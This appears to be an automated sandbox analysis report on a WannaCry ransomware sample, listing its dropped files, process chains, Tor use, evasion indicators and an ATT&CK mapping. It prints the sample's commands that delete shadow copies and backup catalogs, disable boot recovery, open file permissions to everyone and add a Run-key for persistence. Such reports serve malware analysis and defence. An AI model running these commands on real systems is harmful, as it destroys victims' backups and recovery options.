Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet			Jump to behavior

Drops PE files to the document folder of the user

Source: C:\Users\user\Desktop\Wannacry.exe

File created: C:\Users\user\Documents\@WanaDecryptor@.exe

Jump to dropped file

Command shell drops VBS files

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\Desktop\m.vbs

Jump to behavior

Source: C:\Users\user\Desktop\Wannacry.exe

File created: C:\Users\user\Desktop\u.wnry

Jump to dropped file

Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\Public\Desktop\@WanaDecryptor@.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\Desktop\taskdl.exe	Jump to dropped file
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	File created: C:\Users\user\Desktop\TaskData\Tor\libssp-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	File created: C:\Users\user\Desktop\TaskData\Tor\libgcc_s_sjlj-1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\Desktop\@WanaDecryptor@.exe	Jump to dropped file
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	File created: C:\Users\user\Desktop\TaskData\Tor\libevent-2-0-5.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\@WanaDecryptor@.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\Desktop\u.wnry	Jump to dropped file
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	File created: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\Default\Desktop\@WanaDecryptor@.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\Documents\@WanaDecryptor@.exe	Jump to dropped file
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	File created: C:\Users\user\Desktop\TaskData\Tor\ssleay32.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\Desktop\taskse.exe	Jump to dropped file
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	File created: C:\Users\user\Desktop\TaskData\Tor\libeay32.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\@WanaDecryptor@.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\Downloads\@WanaDecryptor@.exe	Jump to dropped file
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	File created: C:\Users\user\Desktop\TaskData\Tor\libevent_extra-2-0-5.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\found.001\@WanaDecryptor@.exe	Jump to dropped file
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	File created: C:\Users\user\Desktop\TaskData\Tor\libevent_core-2-0-5.dll	Jump to dropped file
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	File created: C:\Users\user\Desktop\TaskData\Tor\tor.exe	Jump to dropped file
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	File created: C:\Users\user\Desktop\TaskData\Tor\zlib1.dll	Jump to dropped file

Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\~SD72F1.tmp	Jump to behavior
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\~SD72F2.tmp	Jump to behavior
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Java\~SD72F3.tmp	Jump to behavior
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\~SD7535.tmp	Jump to behavior
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\~SD7536.tmp	Jump to behavior
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\~SD7694.tmp	Jump to behavior
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\~SD7695.tmp	Jump to behavior
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessibility\~SD7696.tmp	Jump to behavior
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\~SD7697.tmp	Jump to behavior
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Administrative Tools\~SD7698.tmp	Jump to behavior
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\~SD7699.tmp	Jump to behavior
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\Extras\~SD769A.tmp	Jump to behavior
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Java\~SD769B.tmp	Jump to behavior
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Maintenance\~SD769C.tmp	Jump to behavior
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\StartUp\~SD769D.tmp	Jump to behavior
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\System Tools\~SD769E.tmp	Jump to behavior
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Windows PowerShell\~SD769F.tmp	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Creates files in the recycle bin to hide itself

Source: C:\Users\user\Desktop\Wannacry.exe

File created: C:\$Recycle.Bin\~SD7162.tmp

Jump to behavior

May use the Tor software to hide its network traffic

Source: @WanaDecryptor@.exe, 0000001B.00000003.2037130930.0000000002863000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmp, taskhsvc.exe.27.dr

Binary or memory string: onion-port

Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 27_2_004067F0 IsIconic,#470,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,#755,#2379,		27_2_004067F0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 30_2_004067F0 IsIconic,#470,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,#755,#2379,		30_2_004067F0

Source: C:\Users\user\Desktop\Wannacry.exe

Process created: C:\Windows\SysWOW64\icacls.exe icacls . /grant Everyone:F /T /C /Q

Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Contains functionality to detect sleep reduction / modifications

Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 27_2_0040D300	27_2_0040D300
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 27_2_0040D4C0	27_2_0040D4C0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 30_2_0040D300	30_2_0040D300
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 30_2_0040D4C0	30_2_0040D4C0

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskse.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskse.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	API coverage: 8.5 %
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	API coverage: 4.2 %

Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\TaskData\Tor\libevent_extra-2-0-5.dll			Jump to dropped file
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\TaskData\Tor\libevent_core-2-0-5.dll			Jump to dropped file

Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Evaded block: after key decision	graph_27-5437
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Evaded block: after key decision	graph_30-4667
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Evaded block: after key decision	graph_30-5519

Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	API call chain: ExitProcess graph end node	graph_27-4857
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	API call chain: ExitProcess graph end node	graph_27-4868
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	API call chain: ExitProcess graph end node	graph_27-4814
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	API call chain: ExitProcess graph end node	graph_27-4692
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	API call chain: ExitProcess graph end node	graph_30-4733
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	API call chain: ExitProcess graph end node	graph_30-4750
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	API call chain: ExitProcess graph end node	graph_30-5467

Source: C:\Users\user\Desktop\Wannacry.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\~SD720A.tmp	Jump to behavior
Source: C:\Users\user\Desktop\Wannacry.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\~SD7208.tmp	Jump to behavior
Source: C:\Users\user\Desktop\Wannacry.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\~SD7209.tmp	Jump to behavior
Source: C:\Users\user\Desktop\Wannacry.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\~SD720C.tmp	Jump to behavior
Source: C:\Users\user\Desktop\Wannacry.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\~SD720D.tmp	Jump to behavior
Source: C:\Users\user\Desktop\Wannacry.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Temp\~SD720B.tmp	Jump to behavior

Source: taskhsvc.exe, 0000001F.00000002.5864422083.00000000010FE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll0
Source: Windows.edb.WNCRYT.0.dr	Binary or memory string: qEmU=:
Source: @WanaDecryptor@.exe, 0000001B.00000002.5855827826.0000000000644000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll&
Source: @WanaDecryptor@.exe, 0000001E.00000002.2120949013.00000000004C7000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 00000021.00000002.5855619618.00000000006A3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe

Code function: 31_2_00EE8B20 memset,GetSystemInfo,GetSystemInfo,__stack_chk_fail,

31_2_00EE8B20

Source: C:\Users\user\Desktop\taskdl.exe	Code function: 6_2_00401080 GetDriveTypeW,Sleep,swprintf,swprintf,FindFirstFileW,swprintf,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z,?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,DeleteFileW,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,DeleteFileW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,	6_2_00401080
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 27_2_004080C0 __p___argv,FindFirstFileA,fopen,fread,sscanf,fopen,fread,fclose,FindNextFileA,FindClose,sprintf,#537,#537,	27_2_004080C0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 27_2_00403CB0 FindFirstFileA,SendMessageA,SendMessageA,sscanf,fopen,fread,sprintf,SendMessageA,#823,SendMessageA,fclose,FindNextFileA,FindClose,	27_2_00403CB0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 27_2_004026B0 swprintf,FindFirstFileW,#825,#825,wcscmp,wcslen,wcscmp,wcscmp,swprintf,GetFileAttributesW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,wcscmp,wcscmp,wcscmp,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,swprintf,swprintf,DeleteFileW,swprintf,DeleteFileW,#825,#825,	27_2_004026B0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 30_2_004080C0 __p___argv,FindFirstFileA,fopen,fread,sscanf,fopen,fread,fclose,FindNextFileA,FindClose,sprintf,#537,#537,	30_2_004080C0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 30_2_00403CB0 FindFirstFileA,SendMessageA,SendMessageA,sscanf,fopen,fread,sprintf,SendMessageA,#823,SendMessageA,fclose,FindNextFileA,FindClose,	30_2_00403CB0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 30_2_004026B0 swprintf,FindFirstFileW,#825,#825,wcscmp,wcslen,wcscmp,wcscmp,swprintf,GetFileAttributesW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,wcscmp,wcscmp,wcscmp,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,swprintf,swprintf,DeleteFileW,swprintf,DeleteFileW,#825,#825,	30_2_004026B0
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Code function: 31_2_00EF843C FindFirstFileA,free,strcmp,strcmp,FindNextFileA,GetLastError,free,FindClose,free,__stack_chk_fail,	31_2_00EF843C

Source: C:\Users\user\Desktop\@WanaDecryptor@.exe

27_2_00404B70

Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe

Code function: 31_2_00D911FD SetUnhandledExceptionFilter,_acmdln,malloc,strlen,malloc,memcpy,__initenv,_cexit,_amsg_exit,_initterm,exit,

31_2_00D911FD

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe //nologo m.vbs	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe vs	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "uqcbeegnpjpsq661" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy delete	Jump to behavior

Source: C:\Users\user\Desktop\@WanaDecryptor@.exe

Code function: 27_2_00401BB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

27_2_00401BB0

Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: SendMessageA,GetUserDefaultLangID,GetLocaleInfoA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,		27_2_00406C20
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: SendMessageA,GetUserDefaultLangID,GetLocaleInfoA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,		30_2_00406C20

Source: C:\Windows\SysWOW64\cscript.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Windows\SysWOW64\cscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe

Code function: 31_2_00FC6F10 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

31_2_00FC6F10

Source: C:\Users\user\Desktop\@WanaDecryptor@.exe

Code function: 27_2_00406F80 SendMessageA,CreateSolidBrush,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateFontA,CreateFontA,#1641,CreateFontA,#1641,CreateFontA,#1641,#3092,SendMessageA,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#860,#537,#537,#540,#2818,#535,#2818,#535,SendMessageA,SendMessageA,#6140,#6140,GetTimeZoneInformation,SystemTimeToTzSpecificLocalTime,SystemTimeToTzSpecificLocalTime,#2818,SystemTimeToTzSpecificLocalTime,#2818,#6334,#800,

27_2_00406F80

Source: C:\Users\user\Desktop\@WanaDecryptor@.exe

Code function: 27_2_0040BED0 #823,GetComputerNameA,GetUserNameA,

27_2_0040BED0

Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe

Code function: 31_2_00EE88BE memset,GetVersionExA,__stack_chk_fail,

31_2_00EE88BE

Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 27_2_0040D6A0 htons,socket,bind,ioctlsocket,ioctlsocket,connect,select,__WSAFDIsSet,__WSAFDIsSet,ioctlsocket,setsockopt,setsockopt,setsockopt,closesocket,	27_2_0040D6A0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 30_2_0040D6A0 htons,socket,bind,ioctlsocket,ioctlsocket,connect,select,__WSAFDIsSet,__WSAFDIsSet,ioctlsocket,setsockopt,setsockopt,setsockopt,closesocket,	30_2_0040D6A0
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Code function: 31_2_00DBC647 abort,abort,abort,_errno,bind,abort,connect,connect,__stack_chk_fail,	31_2_00DBC647
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Code function: 31_2_00DBAF67 listen,listen,listen,__stack_chk_fail,	31_2_00DBAF67
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Code function: 31_2_00DBB015 _errno,_errno,setsockopt,bind,bind,getsockname,abort,memcpy,abort,__stack_chk_fail,	31_2_00DBB015
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Code function: 31_2_00EE739B memset,memset,memset,memset,htonl,abort,bind,listen,getsockname,connect,getsockname,_errno,__stack_chk_fail,	31_2_00EE739B

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	12 Scripting	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	Exfiltration Over Other Network Medium	1 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	21 Data Encrypted for Impact
Default Accounts	21 Native API	1 Registry Run Keys / Startup Folder	11 Process Injection	12 Scripting	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	11 Clipboard Data	Exfiltration Over Bluetooth	22 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	1 Inhibit System Recovery
Domain Accounts	3 Command and Scripting Interpreter	1 Services File Permissions Weakness	1 Registry Run Keys / Startup Folder	2 Obfuscated Files or Information	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Non-Standard Port	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	1 Defacement
Local Accounts	At (Windows)	Logon Script (Mac)	1 Services File Permissions Weakness	1 DLL Side-Loading	NTDS	26 System Information Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	2 Multi-hop Proxy	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 File Deletion	LSA Secrets	21 Security Software Discovery	SSH	Keylogging	Data Transfer Size Limits	1 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	11 Masquerading	Cached Domain Credentials	1 Process Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	2 Proxy	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Modify Registry	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	1 System Owner/User Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
